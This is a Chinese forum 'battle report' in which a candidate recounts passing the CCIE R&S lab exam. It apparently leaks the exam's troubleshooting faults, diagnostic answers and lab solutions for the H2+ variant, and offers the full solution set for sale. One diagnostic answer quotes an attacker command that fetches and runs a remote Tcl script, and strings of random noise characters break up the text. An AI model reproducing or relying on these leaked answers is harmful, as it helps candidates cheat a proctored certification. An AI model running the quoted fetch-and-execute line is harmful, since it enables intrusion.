- 积分
- 154
- 鸿鹄币
- 个
- 好评度
- 点
- 精华
- 最后登录
- 1970-1-1
- 阅读权限
- 20
- 听众
- 收听
助理工程师
|
恭喜「冰风」同志拿到CCIE证书,以下战报分享,希望能帮助大家。祝愿大家都能拿到CCIE号码。
. c6 X6 C ?' V' V4 c8 k, K+ s: @, w5 a9 ]' q
* n7 s/ {" b2 f6 F" b' m$ _, D
TS1 DIAG3++ H2+
9 K' n6 A7 [2 s: C& w' J: S0 e* T# l# S) b$ L' F7 N( l1 j) J
先说说总体感觉:
2 k6 q! @; G2 c% H这次北京只有3个人考试,1个无线,2个RS,我如愿抽到了H2+,另外一个人我提前15分钟交卷时,他还在做,图是H2的图,估计是H2+。所以抽到H2+的几率很大,准备后面考试的兄弟姐妹还是做好H2+的充分准备再上场。2 \ K+ } U$ S$ W
TS1比较简单,尤其是前面几题,错点很少。考前挺担心TS的,尤其是第一题,可以出的错点其实非常多,3月有个朋友网络经验很足,第一题排了半个多小时,整个TS花了两个半小时,那时候lab没出变种,对lab影响不大。现在抽到变种的几率很大,如果TS花的时间太长,对lab影响就很大了。而且TS节省的时间,可以全部加到lab上,也就是说lab时间是可以超过5个半小时。我是提前半小时结束TS,从10点开始做lab,一直到3点45都没提示我交卷,也没有倒计时。$ c% ^) P" C1 Z7 ^( g8 q! {
诊断比较幸运的是,考前2天看战报才了解到有DIAG3++, 备考的诊断资料里都没有提到,幸亏当时记了一下答案。所以考前2天多看战报是很重要的,要是挂在诊断上,岂不是太冤了。
% K! X g; w: z; Qlab抽到H2+, 心情有点小复杂。考前我是带有检验H2+解法的任务来到北京的,前面用我们解法去考H2+的两个兄弟都挂了,大家对解法都不是很有信心。所以做完诊断,还是挺期待抽到H2+的,一方面前面半个月一直在准备变种,另一方面TS和诊断还比较顺利,节约了不少时间给lab。这次能顺利通过,得特别感谢新认识的群友小刘,是他考前2天把我拉到一个新群,让我了解到一个重要的解法:后门用路由拆分(BGP Deaggregate)来实现;和一个重要的新需求:R55/R56不能下放172.0.0.0/8路由到PE,还有其它一些考点的解法讨论,包括如何实现负载等等,让我受益匪浅。
2 ^( Q5 D0 Z3 l9 p1 M2 C. U; `. t) `「欢迎大家关注微信公众号『CCIE战报』,最新最全的战报我会即时更新。」
$ V7 O3 x3 _( L' {" }「大家想看历史战报可以点击战报-历史目录,战报都是大家血与泪走过来的,希望能帮助大家。」. d1 e O4 w$ k4 T
「题主整理了H2+的所有需求和解法以及预配IOU,挂出售卖,希望能给大家节省时间,也能减轻我经济负担。」
, A4 m5 D! ~# {「大家不想花钱或者不信任题主的,可以私聊题主,将更新前整理的资料分享给你,虽有偏差,但也能覆盖百分之八十,你在酌情考虑。」
: H1 A5 I7 Q( H0 n" J6 B「最后,这个战报很详细,大家好好观看,先匿了,祝你顺风。」, o9 v7 W- e( {$ W7 o! ^) L D$ E0 A
TS1:
* ]8 a% D: U* U5 [1)两个交换机vlan12是down的,添加vlan12后出现象;
9 h& Y1 y0 h) j3 G6 a1 c0 H8 B2)PPP常规错点,删掉R17的ppp auth chap callout,添加ppp ipcp route default,把用户名和密码重新刷一遍后出现象;
' m4 T) h; P2 P4 d3)OSPF,R21的e2/0有cost,删掉,R3有两条123.5.5.5的静态(应该影响到是mpls那题),删掉;7 j- o- E% V7 T, i3 x) H
4)eigrp,R13有个接口有delay,删掉,验证现象时图上的metric是1703,所以还要把4个路由器的eigrp都刷上metric weight 0 1 1 1 1 1;
) D# } _) G- B" X5)BGP,极其简单,R12添加max-path 2出现象,可能R22还有个下一跳问题,记不清了,反正错点很少;
( j& m4 d* `+ b6)DMVPN,常规错点,把4个tunnel的配置对一遍,然后ping R19不通,查看R19的s4/0有acl控制,加一条permit ip any any(应该还有更精细的加法)。加密也有个小错,记不清了。R15还要添加no ip split eigrp 200和no ip next-hop-self eigrp 200。0 y% y2 R/ k% R% k4 K
7)ipv6,常规错点,R22的route-map下一跳错,R25没有宣告XX:XX:XX:25::/64
+ C" E0 O# a+ k& T# Z8)MPLS,错点稍多,R8的接口漏配nat,R3,R4,R5,R6的RT错,R3的125网段没有宣告,R4/R6的标签断裂问题等,虽然稍多,但都是我们平时练习到的。按照思路逐步排查,不难。8 H( z9 g, S4 h8 a: ]/ i
9)DMVPN+NAT, R23貌似nat有个小错,因为开始R24 ping R7的外网口不通,排查后通了。检查R24和R7的tunnel配置,把两端的加密去掉后,出ospf邻居成功建立的信息,说明加密有问题,R7的第一阶段加密没有配group,加上后ok;
( Y) F; e! W2 P" m, I( d: c+ V+ b( {10)NAT+DNS, R23的DHCP mac地址配错
% Q8 n$ @ L! x% B 总体TS还是算简单的,第6第8是4个point的分值,其它都是2个point,多花点时间在这2题上。" Z. w- }" B0 N* [9 ~' W, E) ]
/ E9 a- k7 h) F0 P: o. }
DIAG3++:
: |/ p, A7 R1 k0 GDHCP snooping$ L4 L, W X1 F' ?3 ]( j E
q1 抓包 看了一下 找DHCP包 源是0.0.0.0 选114* o) B2 e/ Z. j, H3 J% o, \
q2 单选题 选 sourse ip add is 0.0.0.0: V! S; c+ U+ W4 u O8 P) a
q3 sw1-sw3
, d/ Z9 G x. @- U0 K0 u/ M黑客攻击: P, c2 @' I1 A7 T: r
抓包信息看tcp三次握手信息,判断10.1.1.2是受害者,10.1.1.1是黑客' J+ K, A; g+ u3 ^4 H, x
q1:8选4
' ]% A+ Y3 z3 I' r# S8 ?4 G6 e) w1)TCP connection to 10.1.1.1) R! ~3 b( u* P& F
2)script downloaded from 10.1.1.1 8 Y; W$ D+ F3 J$ x9 K4 x4 [2 b
3)hacker from a remote host to 10.1.1.2 on port 1337 / X. n: l7 @6 h! L$ z4 L
4)ransomware installed by backdoor
# y* y7 U- }* X' o7 g- x7 Pq2: sudo poweroff
+ C3 l* Y- J/ ~, @' {+ Q3 O) nq3: Tclsh http://10.1.1.1.xx.tcl
7 p1 X8 O, ^ j5 ]( r# F8 y这题我有点小纠结,因为有个类似的选项:http://10.1.1.2.xx.tcl.
# d2 `* n8 s! G0 [. G: y4 e) v( ?2 \; s! {
H2+:
- o2 e/ {) M+ Y- F& D% S1)这里我要重点说一下L2的问题,考前一直听说考场H2+的L2存在大bug,多人碰到做完bund,vlan173,184会down,很多人是通过no掉spanning的一些配置来解决的,这样做的结果只能是fail,而且最后反映的L2的得分都很低。考前我对L2的问题也很犯悚,因为不知道为什么会这样,自己在模拟器一直没这种情况。幸亏考前我们在机构版本室再现了这个问题,SW3和SW5做完bund,直接出接口errdisable的信息,errdisable的原因是bgduguard。我们拉来机构老师一起分析,推测原因是:在定义channel-group的时候,在某些IOS版本里,portchannel35和portchannel46没有继承物理链路的中继配置(swi mode trunk),默认还是access,如果SW3和SW5不是相同的版本,就会出现一侧(SW3)是trunk, 一侧(SW5)是0 D# |7 `% G2 Q, }
access,这时bpduguard就会起作用了,SW3一发bpdu,SW5的接口就会errdisable,造成vlan173起不来的现象。
9 w6 V, V7 C& a1 U f2 G; Z8 {解决办法:
2 A7 _3 S/ a* u' `: S在SW3和SW5建portchannel时,两边都把物理接口shutdown,建好portchannel后,确认portchannel的配置是否和物理链路一致,都是trunk,如果portchannel里配置是空的,配上swi tr en do/swi mo tr,之后再把两边接口no shut。
0 [3 H0 L" ]8 E: x O1 j1 T考场我就是这么做的,没有出任何问题,当然我也是步步小心,整个L2花了我40分钟时间。: \/ ?$ L" u, b
2)R17/R19/R20/R21的vrf解法,我就不说了,各机构都有,唯一区别的是有的机构解法里,没有配area 51 stub,理由是要传10.2.0.0/16汇总到area 51。其实配了area 51 stub,也能传,只是R17不能配成stub no-summary。另外提醒一下,配完tunnel以后,R19/R20/R20都把对方的路由前缀trace几次,确保只有1跳,不经过hub,路由表的相应前缀前会多一个%。- D: b: P: X/ J5 J' q8 h
3)OSPF的配置没什么说的,DC区域没有预配,不能用network,不能有2类LSA;其他几个65002区域,OSPF预配都有,只需要在SW1,SW2里passive掉vlan100(题目没要求,属于优化配置) ]: u( o3 ]2 o
4)EIGRP要用64bit命名方式,要解决L052(bandwidth 1K)进路由表的问题,没有限制刷K值还是改rib-scale,推荐用rib-scale,因为用rib-scale=153,出来的metic和现象图里一模一样。
( e- e" ^7 a+ G# D# ~& c2 p5)BGP CE配置,R15/R16汇总10.0.0.0/8,并要下发默认到PE,我用的是network 0.0.0.0。重分布要注意,OSPF重分布到BGP时,用redistribute ospf 1就可以了,后面什么也别跟,他的作用就是在bgp里产生明细,使汇总生效就可以了。R11/R12/R13/R14和老版本一样。验证时要注意,现象图里的as号是65001 65002,不是原来的65001 65001。说明以前通过as-override的方式不行了,要在CE上配nei XXX allowas-in。
9 J/ G/ v! y G7 {6)BGP PE配置,防环没限制方式,用SOO最简单
, f5 P1 {+ v, r/ {' `7)R9和R10的防环,有一堆限制,用distance ospf ext 171可以实现
: F3 q1 J9 k( T- T5 H6 g' O Z8)重点来了,R18和R57之间的后门,我仔细看了几遍需求,agg+summary only是明确的,但没有说只能放一条前缀到对端,理论上用反抑制列表和路由拆分都可以。推荐用路由拆分,防止需求理解错了。这里推荐做个优化:R18 BGP重分布到OSPF时,做个过滤,只放2个前缀过去:172.0.0.0/8和172.18.1.0/24;同理R57上BGP重分布到EIGRP时,只放2个前缀过去:10.0.0.0/8和10.2.100.0/24;我在配完所有配置,检查现象的时候,发现一个奇怪的问题,R18收到了R57回传的10.0.0.0/8,因为这条路由比不过R18汇总产生的10.0.0.0/8,也不影响现象,我因为时间有点紧张,就没有再做优化。建议有时间还是做个优化比较好。
5 h H3 H$ k' ^" h* V+ h9)R55/R56也是容易犯错的地方,单纯实现题目的需求不难,但要实现题目隐含的后门需求,还是要做一番优化的。首先要把10.0.0.0/8的路由过滤掉,不能回传给PE;其次172.0.0.0/8这条路由,要看需求,最早的变种只是要求不能在R55/R56做汇总,那时是可以放172.0.0.0/8到PE,并传给DC区域,这样在DC区域要做的优化是在R15/R16上改OSPF的重分布type为OE1,以达到DC区域优选R15/R16方向的172.0.0.0/8的目的;现在新的需求是,不允许把172.0.0.0/8传到PE,这样势必要把172.0.0.0/8这条路由也过滤掉,同时把172.0.0.0/8 le 32这段的明细都下放给PE,并传到DC区域,这样在DC区域要做的优化就变了,要在R18上改OSPF的重分布type为OE1,以达到DC区域访问172.18.1.0/24优选R18的后门链路;其他还有172.17.x.x的路由,经过双点双向重分布,也要防止回传给PE;过滤的方法有很多种,要理解它们的不同点,比如可以在eigrp重分布到bgp的时候过滤,也可以在nei PE后面加过滤,但对这个场景,必须在重分布的时候过滤,我这里不说原因,备考的同学自己要想明白为什么,我说一下在nei PE后门加过滤的现象:SW10的10.0.0.0/8路由,刚开始是优选R55/R56方向(这是正确的方向),过段时间就会变成优选R57方向。SW10重启SVI口后,会短暂恢复到优选R55/R56方向,之后还是会回到R57方向。: n6 L1 u- _8 l4 H4 h) [
关于SW10的10.0.0.0/8路由,要实现优选R55/R56方向,最简单的方法是R57重分布的时候设置的K值,与R55/R56重分布的时候设置的K值,完全一样。因为SW10与R55/R56之间是SVI接口,和R57之间是eth口,SVI接口本身就比eth口的delay小,在K值设置相同的情况下,自然就会优选R55/R56方向。
; X6 a1 j( g+ s( ~10)做完以上配置,路由互通就差不多完成了,接着就是验证路由是否与现象图完全一致:
. L, V- B" n7 K9 |/ {% xa. R101 trace 172.18.1.254: I4 d, z- W1 G3 U& ~# C6 c
==>走后门, V- w+ Z) I5 C1 P* M1 M( f
b. R101 trace 172.18.2.254
5 z0 a* Z q* q# U, ~. p* L# y==>走MPLS区域
" ?* Z& g/ a1 |; L- Kc. SW10带源trace 10.2.100.100
. C6 g1 i3 P0 V' U5 b==>走后门
: o( c( X; @8 F7 ~ U! Ad. SW10 trace 10.2.101.2538 l' b5 g, \" Y$ _& U
==>走MPLS区域,全负载,但只走R3,不走R4(意味着不需要在R50/R51配maxpath ibgp 2)。如果碰到第3跳开始不负载,有两个方法解决:一个是在R50/R51的e0/0配:ip load-share per-packet;还有一个是在R50/R51的e0/1上配:no ip route-cache cef;两个方法任选一个都行。如果配了这两条还不负载,不要怀疑方法,一定是路由有问题。我考场就碰到了,当时立马有点头晕,冷静下来考虑是不是有条路本身就不通,看trace的路径,走的是R10,把R10的e0/1断开再trace,果然不通了。因为考场有预配mpls,我就没配,检查了几台设备的mpls配置,觉得很花时间,索性把所有设备的mpls重新刷了一遍。刷完就通了,负载现象也出来了。强烈推荐mpls即使有预配也全部重新刷一遍。
2 j3 W. k, B! m: ?. r; ]8 Ne. SW1/SW2 trace 10.2.100.100
2 m" l1 H% E5 }! S: Z/ K==>走mpls区域,全负载,一条路径走R3,一条路径走R4,不需要做任何配置,这个选路是BGP选路原则第8条起作用,所以配maxpath是不起作用的。不负载一定是BGP配的有问题。) } ], {+ @, k- P9 c
11)最后验证后门切换,R18上断开e0/0接口,把上面的a,b,c,d再跑一遍。都要能跑通,走MPLS。我在平时练的时候,这个切换要花2分钟以上,丢十几个包后才通。考场不知道为什么,切换极快,丢几个包就通了。没有时间细究到底什么原因。反倒是切换回来挺花时间的,好像路由拆分要花一段时间路由明细才出来。
F& k% |* V6 T) B( d' e" Z- C, i12)组播要注意一点,因为题目要求R19带source e0/1 ping组播地址,这时候R19就不是源了,而是最后一跳路由器,所以所有的组播配置都要在R19上配。这和H2不同,H2是明确要求SW3没有任何组播配置,但能ping通组播地址,这是因为SW3没有带source ping。0 A6 ]5 Y- b& R8 l) }
13)其他的ipv6和feature就没什么说的了,有些需求的小变化,解起来不难。' ?- a5 J2 R6 D+ g
14)最后提一点,我在平时练习的时候就发现,只要同时配了HSRPv6和DHCP snooping,R101就ping不出去了(地址还是能拿到),SW3同时也会变的很不稳定。我在考场的时候也担心出现这个问题,所以我一直没配DHCP snooping,把所有配置都验证完以后,才配的DHCP snooping,结果果然拿到地址后ping 8.8.8.8就开始丢包了,5个包丢了3个。接着SW3就出现TRC=XX这类平时我们认为模拟器挂了的信息。看来正如题目要求的,需要解决广播风暴的问题。这个好像我还没看到有好的解决方案,只在SW6上的e1/0上配了一条ip dhcp snooping limit rate 10,但显然没起什么作用。幸好SW3 reload以后,所有路由都恢复了,还顺便验证了一把track的配置。此时还剩半个小时,赶紧花了十几分钟用SW4和所有站点都验证了一遍路由,没问题就赶紧交卷了。
, l& ~. ]+ C" j( n8 j& U8 f0 R7 _/ v
这次能顺利通过,需要感谢的人很多,机构的老师,一起备考的同学,各位无私分享的群友,等等,还要感谢考官,没怎么tr我,貌似就是shut down了我几个接口,还让我们提前10分钟进入考场进行考试。所以建议备考的同学当天最好提前半小时到场,能提前考试总是有帮助的。
+ O6 \" k: q, ]6 s- G, [! O, R" y" c
. U8 K! d& m3 V+ e+ s2 F& W- {' d7 E4 f% _7 k
2 H7 p5 m" t3 Z0 e* e
|
|
简体中文
英语
日语
韩语
法语
西班牙语
越南语
泰语
阿拉伯语
俄语
葡萄牙语
德语
意大利语
希腊语
荷兰语
波兰语
保加利亚语
爱沙尼亚语
丹麦语
芬兰语
捷克语
罗马尼亚语
斯洛文尼亚语
瑞典语
匈牙利语
繁体中文
文言文
发表于 2017-5-7 11:09:39
置顶卡
喧嚣卡
变色卡
千斤顶
